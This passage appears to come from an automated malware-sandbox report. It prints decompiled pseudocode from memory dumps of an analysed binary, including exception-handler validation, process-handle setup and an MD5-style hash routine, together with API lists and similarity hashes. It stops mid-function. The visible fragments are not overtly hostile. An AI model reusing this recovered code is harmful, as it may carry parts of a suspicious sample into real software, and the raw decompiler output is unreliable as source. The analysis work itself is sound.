                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID: 8sP
                        • API String ID: 420147892-3124762363
                        • Opcode ID: 102f7ea816ea99114aafa8f6b5441b87e93e3488edae57b9232cb0935dd41764
                        • Instruction ID: 1911ba800a5ed040d122aa3b6c017b5ad5de08598ccdd49dbe044b210aa77a2e
                        • Opcode Fuzzy Hash: 102f7ea816ea99114aafa8f6b5441b87e93e3488edae57b9232cb0935dd41764
                        • Instruction Fuzzy Hash: DEF090366026256BD720A7268C4DEEF7ABCFBD5310F000061FA06D2181EA20D98A86F6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E6C502485(long _a4) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				signed int _v16;
                        				short* _v32;
                        				void _v36;
                        				void* _t57;
                        				signed int _t58;
                        				signed int _t61;
                        				signed int _t62;
                        				void* _t63;
                        				signed int* _t68;
                        				intOrPtr* _t69;
                        				intOrPtr* _t71;
                        				intOrPtr _t72;
                        				intOrPtr _t75;
                        				void* _t76;
                        				signed int _t77;
                        				void* _t78;
                        				void _t80;
                        				signed int _t81;
                        				signed int _t84;
                        				signed int _t86;
                        				short* _t87;
                        				void* _t89;
                        				signed int* _t90;
                        				long _t91;
                        				signed int _t93;
                        				signed int _t94;
                        				signed int _t100;
                        				signed int _t102;
                        				void* _t104;
                        				long _t108;
                        				signed int _t110;
                        
                        				_t108 = _a4;
                        				_t76 =  *(_t108 + 8);
                        				if((_t76 & 0x00000003) != 0) {
                        					L3:
                        					return 0;
                        				}
                        				_a4 =  *[fs:0x4];
                        				_v8 =  *[fs:0x8];
                        				if(_t76 < _v8 || _t76 >= _a4) {
                        					_t102 =  *(_t108 + 0xc);
                        					__eflags = _t102 - 0xffffffff;
                        					if(_t102 != 0xffffffff) {
                        						_t91 = 0;
                        						__eflags = 0;
                        						_a4 = 0;
                        						_t57 = _t76;
                        						do {
                        							_t80 =  *_t57;
                        							__eflags = _t80 - 0xffffffff;
                        							if(_t80 == 0xffffffff) {
                        								goto L9;
                        							}
                        							__eflags = _t80 - _t91;
                        							if(_t80 >= _t91) {
                        								L20:
                        								_t63 = 0;
                        								L60:
                        								return _t63;
                        							}
                        							L9:
                        							__eflags =  *(_t57 + 4);
                        							if( *(_t57 + 4) != 0) {
                        								_t12 =  &_a4;
                        								 *_t12 = _a4 + 1;
                        								__eflags =  *_t12;
                        							}
                        							_t91 = _t91 + 1;
                        							_t57 = _t57 + 0xc;
                        							__eflags = _t91 - _t102;
                        						} while (_t91 <= _t102);
                        						__eflags = _a4;
                        						if(_a4 == 0) {
                        							L15:
                        							_t81 =  *0x6c5041f8;
                        							_t110 = _t76 & 0xfffff000;
                        							_t58 = 0;
                        							__eflags = _t81;
                        							if(_t81 <= 0) {
                        								L18:
                        								_t104 = _t102 | 0xffffffff;
                        								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                        								__eflags = _t61;
                        								if(_t61 < 0) {
                        									_t62 = 0;
                        									__eflags = 0;
                        								} else {
                        									_t62 = _a4;
                        								}
                        								__eflags = _t62;
                        								if(_t62 == 0) {
                        									L59:
                        									_t63 = _t104;
                        									goto L60;
                        								} else {
                        									__eflags = _v12 - 0x1000000;
                        									if(_v12 != 0x1000000) {
                        										goto L59;
                        									}
                        									__eflags = _v16 & 0x000000cc;
                        									if((_v16 & 0x000000cc) == 0) {
                        										L46:
                        										_t63 = 1;
                        										 *0x6c504240 = 1;
                        										__eflags =  *0x6c504240;
                        										if( *0x6c504240 != 0) {
                        											goto L60;
                        										}
                        										_t84 =  *0x6c5041f8;
                        										__eflags = _t84;
                        										_t93 = _t84;
                        										if(_t84 <= 0) {
                        											L51:
                        											__eflags = _t93;
                        											if(_t93 != 0) {
                        												L58:
                        												 *0x6c504240 = 0;
                        												goto L5;
                        											}
                        											_t77 = 0xf;
                        											__eflags = _t84 - _t77;
                        											if(_t84 <= _t77) {
                        												_t77 = _t84;
                        											}
                        											_t94 = 0;
                        											__eflags = _t77;
                        											if(_t77 < 0) {
                        												L56:
                        												__eflags = _t84 - 0x10;
                        												if(_t84 < 0x10) {
                        													_t86 = _t84 + 1;
                        													__eflags = _t86;
                        													 *0x6c5041f8 = _t86;
                        												}
                        												goto L58;
                        											} else {
                        												do {
                        													_t68 = 0x6c504200 + _t94 * 4;
                        													_t94 = _t94 + 1;
                        													__eflags = _t94 - _t77;
                        													 *_t68 = _t110;
                        													_t110 =  *_t68;
                        												} while (_t94 <= _t77);
                        												goto L56;
                        											}
                        										}
                        										_t69 = 0x6c5041fc + _t84 * 4;
                        										while(1) {
                        											__eflags =  *_t69 - _t110;
                        											if( *_t69 == _t110) {
                        												goto L51;
                        											}
                        											_t93 = _t93 - 1;
                        											_t69 = _t69 - 4;
                        											__eflags = _t93;
                        											if(_t93 > 0) {
                        												continue;
                        											}
                        											goto L51;
                        										}
                        										goto L51;
                        									}
                        									_t87 = _v32;
                        									__eflags =  *_t87 - 0x5a4d;
                        									if( *_t87 != 0x5a4d) {
                        										goto L59;
                        									}
                        									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                        									__eflags =  *_t71 - 0x4550;
                        									if( *_t71 != 0x4550) {
                        										goto L59;
                        									}
                        									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                        									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                        										goto L59;
                        									}
                        									_t78 = _t76 - _t87;
                        									__eflags =  *((short*)(_t71 + 6));
                        									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                        									if( *((short*)(_t71 + 6)) <= 0) {
                        										goto L59;
                        									}
                        									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                        									__eflags = _t78 - _t72;
                        									if(_t78 < _t72) {
                        										goto L46;
                        									}
                        									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                        									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                        										goto L46;
                        									}
                        									__eflags =  *(_t89 + 0x27) & 0x00000080;
                        									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                        										goto L20;
                        									}
                        									goto L46;
                        								}
                        							} else {
                        								goto L16;
                        							}
                        							while(1) {
                        								L16:
                        								__eflags =  *((intOrPtr*)(0x6c504200 + _t58 * 4)) - _t110;
                        								if( *((intOrPtr*)(0x6c504200 + _t58 * 4)) == _t110) {
                        									break;
                        								}
                        								_t58 = _t58 + 1;
                        								__eflags = _t58 - _t81;
                        								if(_t58 < _t81) {
                        									continue;
                        								}
                        								goto L18;
                        							}
                        							__eflags = _t58;
                        							if(_t58 <= 0) {
                        								goto L5;
                        							}
                        							 *0x6c504240 = 1;
                        							__eflags =  *0x6c504240;
                        							if( *0x6c504240 != 0) {
                        								goto L5;
                        							}
                        							__eflags =  *((intOrPtr*)(0x6c504200 + _t58 * 4)) - _t110;
                        							if( *((intOrPtr*)(0x6c504200 + _t58 * 4)) == _t110) {
                        								L32:
                        								_t100 = 0;
                        								__eflags = _t58;
                        								if(_t58 < 0) {
                        									L34:
                        									 *0x6c504240 = 0;
                        									goto L5;
                        								} else {
                        									goto L33;
                        								}
                        								do {
                        									L33:
                        									_t90 = 0x6c504200 + _t100 * 4;
                        									_t100 = _t100 + 1;
                        									__eflags = _t100 - _t58;
                        									 *_t90 = _t110;
                        									_t110 =  *_t90;
                        								} while (_t100 <= _t58);
                        								goto L34;
                        							}
                        							_t58 = _t81 - 1;
                        							__eflags = _t58;
                        							if(_t58 < 0) {
                        								L28:
                        								__eflags = _t81 - 0x10;
                        								if(_t81 < 0x10) {
                        									_t81 = _t81 + 1;
                        									__eflags = _t81;
                        									 *0x6c5041f8 = _t81;
                        								}
                        								_t58 = _t81 - 1;
                        								goto L32;
                        							} else {
                        								goto L25;
                        							}
                        							while(1) {
                        								L25:
                        								__eflags =  *((intOrPtr*)(0x6c504200 + _t58 * 4)) - _t110;
                        								if( *((intOrPtr*)(0x6c504200 + _t58 * 4)) == _t110) {
                        									break;
                        								}
                        								_t58 = _t58 - 1;
                        								__eflags = _t58;
                        								if(_t58 >= 0) {
                        									continue;
                        								}
                        								break;
                        							}
                        							__eflags = _t58;
                        							if(__eflags >= 0) {
                        								if(__eflags == 0) {
                        									goto L34;
                        								}
                        								goto L32;
                        							}
                        							goto L28;
                        						}
                        						_t75 =  *((intOrPtr*)(_t108 - 8));
                        						__eflags = _t75 - _v8;
                        						if(_t75 < _v8) {
                        							goto L20;
                        						}
                        						__eflags = _t75 - _t108;
                        						if(_t75 >= _t108) {
                        							goto L20;
                        						}
                        						goto L15;
                        					}
                        					L5:
                        					_t63 = 1;
                        					goto L60;
                        				} else {
                        					goto L3;
                        				}
                        			}





































                        APIs
                        • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6C502536
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: MemoryQueryVirtual
                        • String ID: @BPl$@BPl$@BPl
                        • API String ID: 2850889275-2800570366
                        • Opcode ID: fd5a696530c51662183bf13096e41ffab87bfecb4f2d03fa48d231e2b20cad3e
                        • Instruction ID: 7e7825b7b283c40fbd98607125741e308bfeffc716a13b98ec05ae96a8b928cf
                        • Opcode Fuzzy Hash: fd5a696530c51662183bf13096e41ffab87bfecb4f2d03fa48d231e2b20cad3e
                        • Instruction Fuzzy Hash: 7E61F470705602CFDB19CE29DCA875973F5EB96318F398569D816CBE82EB30D882CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E6C50146C() {
                        				void* _t1;
                        				long _t3;
                        				void* _t4;
                        				long _t5;
                        				void* _t6;
                        				intOrPtr _t8;
                        
                        				_t8 =  *0x6c5041b0;
                        				_t1 = CreateEventA(0, 1, 0, 0);
                        				 *0x6c5041bc = _t1;
                        				if(_t1 == 0) {
                        					return GetLastError();
                        				}
                        				_t3 = GetVersion();
                        				if(_t3 <= 5) {
                        					_t4 = 0x32;
                        					return _t4;
                        				} else {
                        					 *0x6c5041ac = _t3;
                        					_t5 = GetCurrentProcessId();
                        					 *0x6c5041a8 = _t5;
                        					 *0x6c5041b0 = _t8;
                        					_t6 = OpenProcess(0x10047a, 0, _t5);
                        					 *0x6c5041a4 = _t6;
                        					if(_t6 == 0) {
                        						 *0x6c5041a4 =  *0x6c5041a4 | 0xffffffff;
                        					}
                        					return 0;
                        				}
                        			}


                        APIs
                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6C5017B8,73B763F0,00000000), ref: 6C50147B
                        • GetVersion.KERNEL32 ref: 6C50148A
                        • GetCurrentProcessId.KERNEL32 ref: 6C501499
                        • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6C5014B2
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: Process$CreateCurrentEventOpenVersion
                        • String ID:
                        • API String ID: 845504543-0
                        • Opcode ID: 2d4c2a56103da7f954bc1c8e5643a7924cf3457f7dbea2f770b9fd73403abd3b
                        • Instruction ID: 0c0e69c101ef8d2474e2048ffadd4843f739e553771a0be485238d4b4735e373
                        • Opcode Fuzzy Hash: 2d4c2a56103da7f954bc1c8e5643a7924cf3457f7dbea2f770b9fd73403abd3b
                        • Instruction Fuzzy Hash: E9F09A30746710AFFF409F69AC19B423BB4B72AB11F16001EF146CA0C2D3B08040AB8C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,8hQl,6C54B7B8,?,?,?,00000001), ref: 6C548B1F
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 6C548B28
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID: 8hQl
                        • API String ID: 3192549508-3048985772
                        • Opcode ID: 67758587fd8f2e06453831a10d73201833cc5d3484ebbf6b560d71359c1da25c
                        • Instruction ID: 18f33c8217b0b065b46d8380693cd75c65a5a50e218b45ea735d35ef527fdd64
                        • Opcode Fuzzy Hash: 67758587fd8f2e06453831a10d73201833cc5d3484ebbf6b560d71359c1da25c
                        • Instruction Fuzzy Hash: 98B09236044248ABDE102B99D809BB83F78EB0A662F010011F64E448608B76A4908A91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 49%
                        			E00506609(void* __ecx, void* _a4) {
                        				signed int _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				intOrPtr _v44;
                        				intOrPtr _v48;
                        				intOrPtr _v52;
                        				intOrPtr _v56;
                        				intOrPtr _v60;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				intOrPtr _v72;
                        				void _v76;
                        				intOrPtr* _t226;
                        				signed int _t229;
                        				signed int _t231;
                        				signed int _t233;
                        				signed int _t235;
                        				signed int _t237;
                        				signed int _t239;
                        				signed int _t241;
                        				signed int _t243;
                        				signed int _t245;
                        				signed int _t247;
                        				signed int _t249;
                        				signed int _t251;
                        				signed int _t253;
                        				signed int _t255;
                        				signed int _t257;
                        				signed int _t259;
                        				signed int _t274;
                        				signed int _t337;
                        				void* _t347;
                        				signed int _t348;
                        				signed int _t350;
                        				signed int _t352;
                        				signed int _t354;
                        				signed int _t356;
                        				signed int _t358;
                        				signed int _t360;
                        				signed int _t362;
                        				signed int _t364;
                        				signed int _t366;
                        				signed int _t375;
                        				signed int _t377;
                        				signed int _t379;
                        				signed int _t381;
                        				signed int _t383;
                        				intOrPtr* _t399;
                        				signed int _t407;
                        				signed int _t409;
                        				signed int _t411;
                        				signed int _t413;
                        				signed int _t415;
                        				signed int _t417;
                        				signed int _t419;
                        				signed int _t421;
                        				signed int _t423;
                        				signed int _t425;
                        				signed int _t427;
                        				signed int _t429;
                        				signed int _t437;
                        				signed int _t439;
                        				signed int _t441;
                        				signed int _t443;
                        				signed int _t445;
                        				void* _t447;
                        				signed int _t507;
                        				signed int _t598;
                        				signed int _t606;
                        				signed int _t612;
                        				signed int _t678;
                        				signed int* _t681;
                        				signed int _t682;
                        				signed int _t684;
                        				signed int _t689;
                        				signed int _t691;
                        				signed int _t696;
                        				signed int _t698;
                        				signed int _t717;
                        				signed int _t719;
                        				signed int _t721;
                        				signed int _t723;
                        				signed int _t725;
                        				signed int _t727;
                        				signed int _t733;
                        				signed int _t739;
                        				signed int _t741;
                        				signed int _t743;
                        				signed int _t745;
                        				signed int _t747;
                        
                        				_t1 =  &_a4; // 0x50567a
                        				_t226 =  *_t1;
                        				_t347 = __ecx + 2;
                        				_t681 =  &_v76;
                        				_t447 = 0x10;
                        				do {
                        					_t274 =  *(_t347 - 1) & 0x000000ff;
                        					_t347 = _t347 + 4;
                        					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
                        					_t681 =  &(_t681[1]);
                        					_t447 = _t447 - 1;
                        				} while (_t447 != 0);
                        				_t682 =  *(_t226 + 4);
                        				_t407 =  *(_t226 + 8);
                        				_t348 =  *(_t226 + 0xc);
                        				asm("rol eax, 0x7");
                        				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
                        				asm("rol ecx, 0xc");
                        				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
                        				asm("ror edx, 0xf");
                        				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
                        				asm("ror esi, 0xa");
                        				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
                        				_v8 = _t684;
                        				_t689 = _v8;
                        				asm("rol eax, 0x7");
                        				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
                        				asm("rol ecx, 0xc");
                        				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
                        				asm("ror edx, 0xf");
                        				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
                        				asm("ror esi, 0xa");
                        				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
                        				_v8 = _t691;
                        				_t696 = _v8;
                        				asm("rol eax, 0x7");
                        				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
                        				asm("rol ecx, 0xc");
                        				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
                        				asm("ror edx, 0xf");
                        				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
                        				asm("ror esi, 0xa");
                        				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
                        				_v8 = _t698;
                        				asm("rol eax, 0x7");
                        				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                        				asm("rol ecx, 0xc");
                        				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
                        				_t507 =  !_t356;
                        				asm("ror edx, 0xf");
                        				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
                        				_v12 = _t415;
                        				_v12 =  !_v12;
                        				asm("ror esi, 0xa");
                        				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
                        				asm("rol eax, 0x5");
                        				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
                        				asm("rol ecx, 0x9");
                        				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
                        				asm("rol edx, 0xe");
                        				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
                        				asm("ror esi, 0xc");
                        				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
                        				asm("rol eax, 0x5");
                        				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
                        				asm("rol ecx, 0x9");
                        				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
                        				asm("rol edx, 0xe");
                        				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
                        				asm("ror esi, 0xc");
                        				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
                        				asm("rol eax, 0x5");
                        				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
                        				asm("rol ecx, 0x9");
                        				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
                        				asm("rol edx, 0xe");
                        				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
                        				asm("ror esi, 0xc");
                        				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
                        				asm("rol eax, 0x5");
                        				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
                        				asm("rol ecx, 0x9");
                        				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
                        				asm("rol edx, 0xe");
                        				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
                        				asm("ror esi, 0xc");
                        				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
                        				asm("rol eax, 0x4");
                        				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
                        				asm("rol ecx, 0xb");
                        				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
                        				asm("rol edx, 0x10");
                        				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
                        				_t598 = _t366 ^ _t425;
                        				asm("ror esi, 0x9");
                        				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
                        				asm("rol eax, 0x4");
                        				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                        				asm("rol edi, 0xb");
                        				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                        				asm("rol edx, 0x10");
                        				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                        				_t337 = _t606 ^ _t427;
                        				asm("ror ecx, 0x9");
                        				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                        				asm("rol eax, 0x4");
                        				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                        				asm("rol esi, 0xb");
                        				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                        				asm("rol edi, 0x10");
                        				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                        				_t429 = _t733 ^ _t612;
                        				asm("ror ecx, 0x9");
                        				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                        				asm("rol eax, 0x4");
                        				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                        				asm("rol edx, 0xb");
                        				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                        				asm("rol esi, 0x10");
                        				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                        				asm("ror ecx, 0x9");
                        				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                        				asm("rol eax, 0x6");
                        				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                        				asm("rol edx, 0xa");
                        				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                        				asm("rol esi, 0xf");
                        				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                        				asm("ror ecx, 0xb");
                        				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                        				asm("rol eax, 0x6");
                        				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                        				asm("rol edx, 0xa");
                        				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                        				asm("rol esi, 0xf");
                        				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                        				asm("ror ecx, 0xb");
                        				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                        				asm("rol eax, 0x6");
                        				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                        				asm("rol edx, 0xa");
                        				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                        				asm("rol esi, 0xf");
                        				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                        				asm("ror edi, 0xb");
                        				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                        				asm("rol eax, 0x6");
                        				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                        				asm("rol edx, 0xa");
                        				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                        				_t399 = _a4;
                        				asm("rol esi, 0xf");
                        				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                        				 *_t399 =  *_t399 + _t259;
                        				asm("ror eax, 0xb");
                        				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                        				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                        				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                        				return memset( &_v76, 0, 0x40);
                        			}


                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: memset
                        • String ID: zVP
                        • API String ID: 2221118986-565026738
                        • Opcode ID: eab64be8417cd5ac1b5978694f6adc096df73fbdc74eaf4c815df7827f3802de
                        • Instruction ID: 0a65a7e826bc75422487db94638a04360206e3c12b5dad9b3d2227d49157d3e3
                        • Opcode Fuzzy Hash: eab64be8417cd5ac1b5978694f6adc096df73fbdc74eaf4c815df7827f3802de
                        • Instruction Fuzzy Hash: D822847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E005081CD(long _a4) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				signed int _v16;
                        				short* _v32;
                        				void _v36;
                        				void* _t57;
                        				signed int _t58;
                        				signed int _t61;
                        				signed int _t62;
                        				void* _t63;
                        				signed int* _t68;
                        				intOrPtr* _t69;
                        				intOrPtr* _t71;
                        				intOrPtr _t72;
                        				intOrPtr _t75;
                        				void* _t76;
                        				signed int _t77;
                        				void* _t78;
                        				void _t80;
                        				signed int _t81;
                        				signed int _t84;
                        				signed int _t86;
                        				short* _t87;
                        				void* _t89;
                        				signed int* _t90;
                        				long _t91;
                        				signed int _t93;
                        				signed int _t94;
                        				signed int _t100;
                        				signed int _t102;
                        				void* _t104;
                        				long _t108;
                        				signed int _t110;
                        
                        				_t108 = _a4;
                        				_t76 =  *(_t108 + 8);
                        				if((_t76 & 0x00000003) != 0) {
                        					L3:
                        					return 0;
                        				}
                        				_a4 =  *[fs:0x4];
                        				_v8 =  *[fs:0x8];
                        				if(_t76 < _v8 || _t76 >= _a4) {
                        					_t102 =  *(_t108 + 0xc);
                        					__eflags = _t102 - 0xffffffff;
                        					if(_t102 != 0xffffffff) {
                        						_t91 = 0;
                        						__eflags = 0;
                        						_a4 = 0;
                        						_t57 = _t76;
                        						do {
                        							_t80 =  *_t57;
                        							__eflags = _t80 - 0xffffffff;
                        							if(_t80 == 0xffffffff) {
                        								goto L9;
                        							}
                        							__eflags = _t80 - _t91;
                        							if(_t80 >= _t91) {
                        								L20:
                        								_t63 = 0;
                        								L60:
                        								return _t63;
                        							}
                        							L9:
                        							__eflags =  *(_t57 + 4);
                        							if( *(_t57 + 4) != 0) {
                        								_t12 =  &_a4;
                        								 *_t12 = _a4 + 1;
                        								__eflags =  *_t12;
                        							}
                        							_t91 = _t91 + 1;
                        							_t57 = _t57 + 0xc;
                        							__eflags = _t91 - _t102;
                        						} while (_t91 <= _t102);
                        						__eflags = _a4;
                        						if(_a4 == 0) {
                        							L15:
                        							_t81 =  *0x50a330; // 0x0
                        							_t110 = _t76 & 0xfffff000;
                        							_t58 = 0;
                        							__eflags = _t81;
                        							if(_t81 <= 0) {
                        								L18:
                        								_t104 = _t102 | 0xffffffff;
                        								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                        								__eflags = _t61;
                        								if(_t61 < 0) {
                        									_t62 = 0;
                        									__eflags = 0;
                        								} else {
                        									_t62 = _a4;
                        								}
                        								__eflags = _t62;
                        								if(_t62 == 0) {
                        									L59:
                        									_t63 = _t104;
                        									goto L60;
                        								} else {
                        									__eflags = _v12 - 0x1000000;
                        									if(_v12 != 0x1000000) {
                        										goto L59;
                        									}
                        									__eflags = _v16 & 0x000000cc;
